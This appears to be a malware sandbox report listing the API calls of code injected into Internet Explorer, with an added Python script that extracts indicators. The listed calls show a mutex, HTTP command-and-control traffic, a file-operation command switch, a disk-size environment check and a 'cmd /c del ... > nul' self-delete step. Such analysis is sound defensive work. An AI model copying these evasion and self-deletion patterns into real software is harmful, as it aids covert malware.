      • Part of subcall function 005148A0: CreateDirectoryA.KERNELBASE(-0000D007,00000000), ref: 005148F5
      • Part of subcall function 005148A0: CreateDirectoryA.KERNELBASE(-0000D007,00000000), ref: 00514909
      • Part of subcall function 005148A0: ___swprintf_l.LIBCMT ref: 0051493E
      • Part of subcall function 0051494C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0051496C
      • Part of subcall function 0051494C: ReadFile.KERNEL32(00000000,?,00000269,?,00000000), ref: 00514993
      • Part of subcall function 0051494C: CloseHandle.KERNEL32(00000000), ref: 0051499A
      • Part of subcall function 0051494C: ??2@YAPAXI@Z.MSVCRT ref: 005149A7
      • Part of subcall function 0051494C: ??3@YAXPAX@Z.MSVCRT ref: 005149CD
      • Part of subcall function 005149DD: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000000,00000000), ref: 00514A11
      • Part of subcall function 005149DD: memcpy.MSVCRT ref: 00514A35
      • Part of subcall function 005149DD: ??2@YAPAXI@Z.MSVCRT ref: 00514A3C
      • Part of subcall function 005149DD: ??3@YAXPAX@Z.MSVCRT ref: 00514A62
      • Part of subcall function 005149DD: WriteFile.KERNEL32(?,?,00000269,?,00000000), ref: 00514A7D
      • Part of subcall function 005149DD: CloseHandle.KERNEL32(?), ref: 00514A86
      • Part of subcall function 00514B82: ??2@YAPAXI@Z.MSVCRT ref: 00514B9C
      • Part of subcall function 00514B82: GetAdaptersInfo.IPHLPAPI(00000000,6Q), ref: 00514BAC
      • Part of subcall function 00514B82: ??3@YAXPAX@Z.MSVCRT ref: 00514BB7
      • Part of subcall function 00514B82: ??2@YAPAXI@Z.MSVCRT ref: 00514BC0
      • Part of subcall function 00514B82: GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 00514BD0
      • Part of subcall function 00514B82: ??3@YAXPAX@Z.MSVCRT ref: 00514C60
    • inet_addr.WS2_32(?), ref: 005136FD
      • Part of subcall function 00514C71: memset.MSVCRT ref: 00514C9D
      • Part of subcall function 00514C71: WSAStartup.WS2_32(00000002,?), ref: 00514CAE
      • Part of subcall function 00514C71: gethostname.WS2_32(00000000,00000100), ref: 00514CC3
      • Part of subcall function 00514C71: gethostbyname.WS2_32(00000000), ref: 00514CD3
      • Part of subcall function 00514C71: inet_ntoa.WS2_32(?), ref: 00514CE3
      • Part of subcall function 00514C71: WSACleanup.WS2_32 ref: 00514CF2
    • GetLocalTime.KERNEL32(?,?), ref: 00513780
    • GetLocalTime.KERNEL32(?), ref: 005137B5
    • WaitForSingleObject.KERNEL32(?,000927C0), ref: 005137C2
    • GetLocalTime.KERNEL32(?), ref: 005137DD
    • WaitForSingleObject.KERNEL32(?,000927C0), ref: 005137EA
    • time.MSVCRT ref: 005138C0
    • srand.MSVCRT ref: 005138C7
    • rand.MSVCRT ref: 005138D9
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0051393E
    • time.MSVCRT ref: 005139B0
    • srand.MSVCRT ref: 005139B7
    • rand.MSVCRT ref: 005139C3
    • WaitForSingleObject.KERNEL32(?,?), ref: 00513A17
      • Part of subcall function 00516653: free.MSVCRT(00000000,00513A3A), ref: 0051665E
      • Part of subcall function 00517C7C: GlobalMemoryStatusEx.KERNELBASE(00000000,?,00000000,?), ref: 00517CCD
    • CloseHandle.KERNEL32(00000000), ref: 00513A61
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
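    Every listing on this page uses the same line format: one bullet per resolved call, "Api.MODULE(args), ref: ADDR", with a "Part of subcall function ADDR:" prefix for calls made inside a callee. An analyst normally wants the indicators pulled out of that text rather than read call by call: the "donotbotherme" mutex and the {2CB55487-9F5C-48D4-B6A1-2521E247A169} event name, the FXSAPIDebugLogFile.tmp log path, GetDiskFreeSpaceExW resolved through GetModuleHandleW/GetProcAddress and applied to the GetTempPathW result (a disk-capacity query that is commonly used as an environment check), the WaitForSingleObject timeouts (000927C0 is 600000 ms, ten minutes), and the cmd.exe "/c del ... > nul" followed by ShellExecuteExW and ExitProcess in function 00516239, which removes the client's own executable. The Python below is an added example, not part of the report or the sample: it parses lines in this format, groups them by function and applies those rules. SAMPLE is a handful of lines copied from this page's listings; the rule names are the example's own.

```python
"""Triage helper for Joe Sandbox HCA 'APIs' listings (added example, not
part of the report).  Parses the bullet lines, groups calls by function and
extracts named objects, file paths, dynamically resolved imports, wait
timeouts and the cmd.exe self-delete sequence."""
import re
from collections import defaultdict

# '• Api.MODULE(args), ref: ADDR', optionally prefixed by
# 'Part of subcall function ADDR:'.  Api names may contain '?' and '@'
# (decorated operator new/delete), so only '.', space and '(' end them.
LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
HEX_WORD = re.compile(r"^-?[0-9A-Fa-f]{8}$")      # an unresolved stack value
EXPORT_NAME = re.compile(r"^[A-Z][A-Za-z0-9_]+$")  # looks like a Win32 export


def parse(listing: str):
    """Yield (function_id, api, module, args, ref).  Top-level bullets belong
    to the current 'APIs' unit, identified by the first ref seen in it;
    subcall bullets belong to the subcall's own address."""
    unit = None
    for line in listing.splitlines():
        if line.strip() == "APIs":
            unit = None
            continue
        m = LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        if m["sub"]:
            fn = m["sub"].upper()
        else:
            unit = unit or m["ref"].upper()
            fn = unit
        yield fn, m["api"], m["mod"].upper(), args, m["ref"].upper()


def is_literal(arg: str) -> bool:
    """A value the plugin resolved to a string, not '?' or a raw hex word."""
    return bool(arg) and arg != "?" and not HEX_WORD.match(arg)


def triage(listing: str):
    """Return sorted, de-duplicated (function_id, rule, value) findings."""
    by_fn = defaultdict(list)
    for fn, api, mod, args, ref in parse(listing):
        by_fn[fn].append((api, args))
    findings = set()
    for fn, calls in by_fn.items():
        apis = {api for api, _ in calls}
        for api, args in calls:
            # CreateMutexA/W take the name as the 3rd argument, CreateEventA/W as the 4th.
            if api.startswith(("CreateMutex", "CreateEvent")):
                idx = 3 if api.startswith("CreateEvent") else 2
                if len(args) > idx and is_literal(args[idx]):
                    findings.add((fn, "named-object", args[idx]))
            if api.startswith("CreateFile") and args and ("\\" in args[0] or ":" in args[0]):
                findings.add((fn, "file-path", args[0]))
            if api in ("GetModuleHandleA", "GetModuleHandleW", "GetProcAddress"):
                for a in args:
                    if EXPORT_NAME.match(a):
                        findings.add((fn, "dynamic-import", a))
            if api == "WaitForSingleObject" and len(args) > 1 and HEX_WORD.match(args[1]) \
                    and args[1].upper() not in ("00000000", "FFFFFFFF"):
                findings.add((fn, "wait-ms", str(int(args[1], 16))))
        if {"GetTempPathW", "GetDiskFreeSpaceExW"} <= apis:
            findings.add((fn, "disk-size-check", "GetTempPathW+GetDiskFreeSpaceExW"))
        cmd_del = any(api.startswith("lstrcpy") and any(a.startswith("/c del") for a in args)
                      for api, args in calls)
        if cmd_del and {"ShellExecuteExW", "ExitProcess"} <= apis:
            findings.add((fn, "self-delete", "cmd /c del ... > nul; ShellExecuteExW; ExitProcess"))
    return sorted(findings)


# Lines copied from this report's listings (three separate 'APIs' units).
SAMPLE = r"""APIs
• __EH_prolog3_GS.LIBCMT ref: 005135DE
• CreateMutexA.KERNELBASE(00000000,00000001,donotbotherme,000002A8,00516509,?,?), ref: 00513607
• GetLastError.KERNEL32 ref: 0051360F
  • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
• inet_addr.WS2_32(?), ref: 005136FD
• WaitForSingleObject.KERNEL32(?,000927C0), ref: 005137C2
APIs
• GetModuleHandleW.KERNEL32(kernel32,GetDiskFreeSpaceExW,00000040,?,?,00517D23,00000000,00000000), ref: 00516D70
• GetProcAddress.KERNEL32(00000000,?,?,00517D23,00000000,00000000), ref: 00516D77
• GetTempPathW.KERNEL32(00000104,00000000), ref: 00516D98
• GetDiskFreeSpaceExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00517D23,00000000,00000000), ref: 00516DAD
APIs
• CreateEventW.KERNEL32(00000000,00000001,00000000,{2CB55487-9F5C-48D4-B6A1-2521E247A169}), ref: 004F1238
  • Part of subcall function 00516239: lstrcpyW.KERNEL32(?,/c del ), ref: 0051631B
  • Part of subcall function 00516239: lstrcatW.KERNEL32(?, > nul), ref: 00516343
  • Part of subcall function 00516239: ShellExecuteExW.SHELL32(?), ref: 00516375
  • Part of subcall function 00516239: ExitProcess.KERNEL32 ref: 005163BB
"""

if __name__ == "__main__":
    for fn, rule, value in triage(SAMPLE):
        print(f"{fn}  {rule:16} {value}")
```

    The rules are deliberately narrow: a named mutex or event is reported only when the plugin resolved the name to a string, and the disk-size and self-delete rules require the full API combination inside one function, so a lone GetDiskFreeSpaceExW in an installer does not fire. The same parser can be pointed at the full report text, where the FXSAPIDebugLogFile.tmp path and the 00517FBE logger will appear once rather than at every call site.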

    Control-flow Graph

    APIs
    • CreateEventW.KERNEL32(00000000,00000001,00000000,{2CB55487-9F5C-48D4-B6A1-2521E247A169}), ref: 004F1238
    • GetLastError.KERNEL32 ref: 004F1249
    • memset.MSVCRT ref: 004F126A
    • GetModuleFileNameW.KERNEL32(?,00000104), ref: 004F1282
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004F1298
    • GetFileSize.KERNEL32(00000000,00000000), ref: 004F12AE
    • ??2@YAPAXI@Z.MSVCRT ref: 004F12B9
    • memset.MSVCRT ref: 004F12CA
    • ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 004F12DE
    • CloseHandle.KERNEL32(00000000), ref: 004F12E5
      • Part of subcall function 004F1000: memset.MSVCRT ref: 004F102B
      • Part of subcall function 004F1000: GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 004F1040
      • Part of subcall function 004F1000: memset.MSVCRT ref: 004F109D
      • Part of subcall function 004F1000: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 004F10B0
      • Part of subcall function 004F1000: GetShortPathNameA.KERNEL32(00000000,00000000,00000104), ref: 004F10D4
      • Part of subcall function 004F1000: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020006,?), ref: 004F1130
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 004F12FE
      • Part of subcall function 004F342F: _errno.MSVCRT ref: 004F3447
      • Part of subcall function 004F342F: _errno.MSVCRT ref: 004F349E
    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 004F131B
    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 004F1334
    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 004F134D
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004F1371
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000), ref: 004F138E
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004F13A8
    • CloseHandle.KERNEL32(?), ref: 004F13B1
    • WaitForSingleObject.KERNEL32(?,00003A98), ref: 004F13BF
    • ??3@YAXPAX@Z.MSVCRT ref: 004F13D3
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd

    Control-flow Graph

    Function 005130ED (the rendered graph and its executed/not-executed colouring were not captured; the list below is recovered from the graph data). Block 0051313A-00513141 branches either to the WinHttpSendRequest block at 0051317F or, through 00513143, to the call of 0051327C at 0051314D (the routine that itself performs WinHttpSendRequest and WinHttpWriteData); both paths converge on WinHttpReceiveResponse at 00513163. Blocks containing calls, in address order:
    • 005130ED-00513126: call 00512CCF
    • 0051312D: call 00517FBE
    • 0051314D-00513158: call 0051327C
    • 00513163-0051316F: WinHttpReceiveResponse
    • 00513171-0051317D: GetLastError
    • 0051317F-00513190: WinHttpSendRequest
    • 00513192-00513199: GetLastError
    • 0051319E-005131A4: call 00517FBE
    • 005131A6-005131DB: WinHttpQueryHeaders, GetLastError
    • 005131DD-00513200: WinHttpQueryHeaders, _wtoi
    • 00513207-00513213: call 00517FBE
    • 00513224-0051325A: WinHttpQueryAuthSchemes, WinHttpSetCredentials
    • 0051326B-00513279: call 0051A460
    APIs
      • Part of subcall function 00512CCF: memset.MSVCRT ref: 00512D12
      • Part of subcall function 00512CCF: memset.MSVCRT ref: 00512D77
      • Part of subcall function 00512CCF: memset.MSVCRT ref: 00512DA7
      • Part of subcall function 00512CCF: ??2@YAPAXI@Z.MSVCRT ref: 00512DEA
      • Part of subcall function 00512CCF: ??2@YAPAXI@Z.MSVCRT ref: 00512E1B
      • Part of subcall function 00512CCF: ??2@YAPAXI@Z.MSVCRT ref: 00512E4C
      • Part of subcall function 00512CCF: ??3@YAXPAX@Z.MSVCRT ref: 00512F06
      • Part of subcall function 00512CCF: ??3@YAXPAX@Z.MSVCRT ref: 00512F12
      • Part of subcall function 00512CCF: ??3@YAXPAX@Z.MSVCRT ref: 00512F1E
      • Part of subcall function 00512CCF: ??2@YAPAXI@Z.MSVCRT ref: 00512F33
      • Part of subcall function 00512CCF: ??2@YAPAXI@Z.MSVCRT ref: 00512F4C
      • Part of subcall function 00512CCF: rand.MSVCRT ref: 00512F5A
      • Part of subcall function 00512CCF: __swprintf_c_l.LIBCMT ref: 00512F7B
      • Part of subcall function 00512CCF: ??3@YAXPAX@Z.MSVCRT ref: 00512FB1
      • Part of subcall function 00512CCF: rand.MSVCRT ref: 00512FBB
      • Part of subcall function 00512CCF: __swprintf_c_l.LIBCMT ref: 00512FD7
      • Part of subcall function 00512CCF: ??3@YAXPAX@Z.MSVCRT ref: 0051300D
      • Part of subcall function 00512CCF: rand.MSVCRT ref: 00513017
      • Part of subcall function 00512CCF: __swprintf_c_l.LIBCMT ref: 00513033
      • Part of subcall function 00512CCF: ??3@YAXPAX@Z.MSVCRT ref: 00513065
      • Part of subcall function 00512CCF: ??3@YAXPAX@Z.MSVCRT ref: 0051307D
      • Part of subcall function 00512CCF: WinHttpAddRequestHeaders.WINHTTP(?,00000000,00000002,A0000000), ref: 005130BB
      • Part of subcall function 00512CCF: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 005130C5
      • Part of subcall function 00512CCF: ??3@YAXPAX@Z.MSVCRT ref: 005130DB
      • Part of subcall function 0051327C: memset.MSVCRT ref: 005132A2
      • Part of subcall function 0051327C: __swprintf_c_l.LIBCMT ref: 005132B8
      • Part of subcall function 0051327C: WinHttpAddRequestHeaders.WINHTTP(?,?,?,A0000000,?,?,?,?,?,?,?,00000000), ref: 005132E1
      • Part of subcall function 0051327C: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 005132EB
      • Part of subcall function 0051327C: WinHttpSendRequest.WINHTTP(?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0051330B
      • Part of subcall function 0051327C: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00513315
      • Part of subcall function 0051327C: WinHttpWriteData.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00513331
      • Part of subcall function 0051327C: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0051333B
    • WinHttpReceiveResponse.WINHTTP(?,00000000,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 00513167
    • GetLastError.KERNEL32(?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 00513171
    • WinHttpSendRequest.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,00000000,000004A9,000003E9,0000D10B,00000000,00000000,000003E9,?,?), ref: 00513188
    • GetLastError.KERNEL32(?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 00513192
    • WinHttpQueryHeaders.WINHTTP(?,00000013,00000000,00000000,00000000,00000000,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 005131D0
    • GetLastError.KERNEL32(?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 005131D2
    • WinHttpQueryHeaders.WINHTTP(?,00000013,00000000,00000000,00000000,00000000,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 005131EC
    • _wtoi.MSVCRT ref: 005131F2
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • WinHttpQueryAuthSchemes.WINHTTP(?,?,?,:EQ,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 0051323C
    • WinHttpSetCredentials.WINHTTP(?,:EQ,?,00000729,0000075B,00000000,?,0051453A,00000000,00000000,000003E9,?,00000001,?,00000000), ref: 0051325A
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd

    Control-flow Graph

    Function 005141F0 (the rendered graph and its executed/not-executed colouring were not captured; the list below is recovered from the graph data). Block 0051432D, reached after the call of 005140AA at 005142E8 via 00514303 and 0051431E, has twelve successors (00514334, 0051434E, 00514365, 00514374, 00514382, 0051439F, 005143B4, 005143C6, 005143ED, 00514407, 0051443C and 00514447), i.e. a switch that dispatches to the handlers calling 00514D05, 00514F64, 00515258, 005159AF, 00515CDD, 00515E8D, 00515F93 and 00516178/00516239; block 00514427-00514430 loops back to 005142E8. Blocks containing calls, in address order:
    • 0051422C-0051425E: call 0051A79D, call 0051A729, call 00518FE7
    • 00514260-00514267: call 005144A4
    • 00514275-0051427A: call 00517FBE
    • 00514287-0051429C: call 005149DD
    • 0051429E-005142B0: GetLastError, call 00517FBE
    • 005142BA-005142C8: call 005144A4
    • 005142D7-005142E6: ??2@YAPAXI@Z
    • 005142E8-005142FD: call 005140AA
    • 00514311-00514317: call 00517FBE
    • 00514334-00514342: call 005144A4
    • 0051434E-00514359: call 00514D05
    • 00514365-00514372: call 00514F64
    • 00514374-00514380: call 00515258
    • 00514382-0051439D: call 005159AF, call 005144A4
    • 0051439F-005143B2: call 00515CDD
    • 005143B4-005143C4: call 00515E8D
    • 005143C6-005143D7: call 00515F93
    • 005143D9-005143EB: call 00517FBE
    • 005143ED-00514405: call 00516178, call 00516239
    • 00514407-0051440E: call 00517FBE
    • 00514427-00514430: call 00517FBE
    • 0051443C-00514445: ??3@YAXPAX@Z
    • 0051444A-00514450: ??3@YAXPAX@Z
    • 00514452-00514460: call 0051A460
    APIs
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7F0
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A741
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A788
      • Part of subcall function 00518FE7: time.MSVCRT ref: 0051900D
      • Part of subcall function 00518FE7: srand.MSVCRT ref: 00519014
      • Part of subcall function 00518FE7: ??2@YAPAXI@Z.MSVCRT ref: 0051901C
      • Part of subcall function 00518FE7: rand.MSVCRT ref: 00519040
      • Part of subcall function 00518FE7: ??3@YAXPAX@Z.MSVCRT ref: 005190BC
    • GetLastError.KERNEL32(?,00000000,000003E9,?,?,?,?,?,00000000), ref: 0051429E
    • ??2@YAPAXI@Z.MSVCRT ref: 005142DC
      • Part of subcall function 005140AA: WinHttpQueryDataAvailable.WINHTTP(?,00000000,?,00000000,?,?), ref: 005140C4
      • Part of subcall function 005140AA: GetLastError.KERNEL32 ref: 005140CE
      • Part of subcall function 005140AA: ??2@YAPAXI@Z.MSVCRT ref: 00514130
      • Part of subcall function 005140AA: ??2@YAPAXI@Z.MSVCRT ref: 00514156
      • Part of subcall function 005140AA: ??3@YAXPAX@Z.MSVCRT ref: 00514181
      • Part of subcall function 005140AA: ??3@YAXPAX@Z.MSVCRT ref: 00514188
      • Part of subcall function 005140AA: ??3@YAXPAX@Z.MSVCRT ref: 0051419B
      • Part of subcall function 005140AA: ??3@YAXPAX@Z.MSVCRT ref: 005141C7
      • Part of subcall function 005140AA: ??3@YAXPAX@Z.MSVCRT ref: 005141E2
      • Part of subcall function 005144A4: ??2@YAPAXI@Z.MSVCRT ref: 005144D4
      • Part of subcall function 005144A4: memset.MSVCRT ref: 005144E0
      • Part of subcall function 005144A4: memcpy.MSVCRT ref: 005144F8
      • Part of subcall function 005144A4: ??3@YAXPAX@Z.MSVCRT ref: 00514516
      • Part of subcall function 005144A4: ??3@YAXPAX@Z.MSVCRT ref: 00514520
      • Part of subcall function 00514D05: memset.MSVCRT ref: 00514D3A
      • Part of subcall function 00514D05: GetLastError.KERNEL32(00000001,?,00000000), ref: 00514D50
      • Part of subcall function 00514D05: memcpy.MSVCRT ref: 00514DBE
      • Part of subcall function 00514D05: memcpy.MSVCRT ref: 00514E2D
      • Part of subcall function 00514D05: memcpy.MSVCRT ref: 00514E87
      • Part of subcall function 00514D05: memcpy.MSVCRT ref: 00514ED7
      • Part of subcall function 00514F64: memset.MSVCRT ref: 00515004
      • Part of subcall function 00514F64: memset.MSVCRT ref: 00515062
      • Part of subcall function 00514F64: strstr.MSVCRT ref: 005150A5
      • Part of subcall function 00514F64: GetLastError.KERNEL32(00000000,?,00000000), ref: 00515220
      • Part of subcall function 00515258: ??2@YAPAXI@Z.MSVCRT ref: 00515288
      • Part of subcall function 00515258: memset.MSVCRT ref: 00515295
      • Part of subcall function 00515258: ??2@YAPAXI@Z.MSVCRT ref: 005152A2
      • Part of subcall function 00515258: memset.MSVCRT ref: 005152B5
      • Part of subcall function 00515258: memcpy.MSVCRT ref: 005152C5
      • Part of subcall function 00515258: ??2@YAPAXI@Z.MSVCRT ref: 005152DE
      • Part of subcall function 00515258: memset.MSVCRT ref: 005152ED
      • Part of subcall function 00515258: strstr.MSVCRT ref: 0051532E
      • Part of subcall function 00515258: ??3@YAXPAX@Z.MSVCRT ref: 00515453
      • Part of subcall function 00515258: ??3@YAXPAX@Z.MSVCRT ref: 0051545C
      • Part of subcall function 00515258: ??3@YAXPAX@Z.MSVCRT ref: 00515463
      • Part of subcall function 005159AF: memset.MSVCRT ref: 005159E7
      • Part of subcall function 005159AF: ??2@YAPAXI@Z.MSVCRT ref: 00515A3A
      • Part of subcall function 005159AF: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00515A60
      • Part of subcall function 005159AF: GetLastError.KERNEL32 ref: 00515A71
      • Part of subcall function 005159AF: GetFileSize.KERNEL32(00000000,00000000), ref: 00515A93
      • Part of subcall function 005159AF: GetLastError.KERNEL32 ref: 00515AA4
      • Part of subcall function 005159AF: memset.MSVCRT ref: 00515AB6
      • Part of subcall function 005159AF: memcpy.MSVCRT ref: 00515AD1
      • Part of subcall function 005159AF: GetLastError.KERNEL32(00000000,?,000003F0,?,?,?,?,?,?,?,?,00000000,000003EB), ref: 00515B02
      • Part of subcall function 005159AF: GetTickCount.KERNEL32(00000000,?,000003F0,?,?,?,?,?,?,?,?,00000000,000003EB), ref: 00515B12
      • Part of subcall function 005159AF: srand.MSVCRT ref: 00515B19
      • Part of subcall function 005159AF: memset.MSVCRT ref: 00515B23
      • Part of subcall function 005159AF: rand.MSVCRT ref: 00515B32
      • Part of subcall function 005159AF: ReadFile.KERNEL32(?,0000000C,0000C60B,00000000,00000000), ref: 00515B5B
      • Part of subcall function 005159AF: GetLastError.KERNEL32 ref: 00515B65
      • Part of subcall function 005159AF: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00515BBC
      • Part of subcall function 005159AF: GetLastError.KERNEL32(00000000,-0000000C,000003F1,?), ref: 00515BE7
      • Part of subcall function 005159AF: ??3@YAXPAX@Z.MSVCRT ref: 00515C28
      • Part of subcall function 00515CDD: memset.MSVCRT ref: 00515CFB
      • Part of subcall function 00515CDD: ??2@YAPAXI@Z.MSVCRT ref: 00515D57
      • Part of subcall function 00515CDD: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000000,00000000), ref: 00515D82
      • Part of subcall function 00515CDD: CloseHandle.KERNEL32(00000000), ref: 00515D8E
      • Part of subcall function 00515CDD: memcpy.MSVCRT ref: 00515DA4
      • Part of subcall function 00515CDD: GetLastError.KERNEL32(?,?,?,?,00000000,000003EB,?,?,?,?,?,00000000), ref: 00515DD1
      • Part of subcall function 00515CDD: ??3@YAXPAX@Z.MSVCRT ref: 00515E78
      • Part of subcall function 00515E8D: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 00515EBD
      • Part of subcall function 00515E8D: Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 00515ED0
      • Part of subcall function 00515E8D: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 00515EE6
      • Part of subcall function 00515E8D: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,?,?,?,?,00000000), ref: 00515F1C
      • Part of subcall function 00515E8D: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00515F2E
      • Part of subcall function 00515E8D: GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00515F38
      • Part of subcall function 00515E8D: GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00515F50
      • Part of subcall function 00515E8D: CloseHandle.KERNEL32(000000FF), ref: 00515F6D
      • Part of subcall function 00515F93: ??2@YAPAXI@Z.MSVCRT ref: 00515FA9
      • Part of subcall function 00515F93: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00515FC9
      • Part of subcall function 00515F93: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00515F8B), ref: 00515FE0
      • Part of subcall function 00515F93: CloseHandle.KERNEL32(00515F8B), ref: 00515FEC
      • Part of subcall function 00515F93: memcpy.MSVCRT ref: 0051603E
      • Part of subcall function 00515F93: memcpy.MSVCRT ref: 00516052
      • Part of subcall function 00515F93: ??3@YAXPAX@Z.MSVCRT ref: 00516087
      • Part of subcall function 00516178: DeleteFileA.KERNEL32(?,00520170,0000002C,005143F8,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,000003EB,?,00000000), ref: 005161AD
      • Part of subcall function 00516178: GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 005161C0
      • Part of subcall function 00516239: GetModuleFileNameW.KERNEL32(?,?,00000104,?), ref: 00516269
      • Part of subcall function 00516239: GetShortPathNameW.KERNEL32(?,?,00000104), ref: 00516280
      • Part of subcall function 00516239: GetEnvironmentVariableW.KERNEL32(COMSPEC,?,00000104), ref: 00516298
      • Part of subcall function 00516239: wcsstr.MSVCRT ref: 005162B3
      • Part of subcall function 00516239: memset.MSVCRT ref: 005162D4
      • Part of subcall function 00516239: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 005162E7
      • Part of subcall function 00516239: DeleteFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00516309
      • Part of subcall function 00516239: lstrcpyW.KERNEL32(?,/c del ), ref: 0051631B
      • Part of subcall function 00516239: lstrcatW.KERNEL32(?,?), ref: 00516335
      • Part of subcall function 00516239: lstrcatW.KERNEL32(?, > nul), ref: 00516343
      • Part of subcall function 00516239: ShellExecuteExW.SHELL32(?), ref: 00516375
      • Part of subcall function 00516239: SetPriorityClass.KERNEL32(?,00000040), ref: 00516389
      • Part of subcall function 00516239: GetCurrentProcess.KERNEL32(00000100), ref: 00516390
      • Part of subcall function 00516239: SetPriorityClass.KERNEL32(00000000), ref: 00516397
      • Part of subcall function 00516239: GetCurrentThread.KERNEL32(0000000F), ref: 0051639B
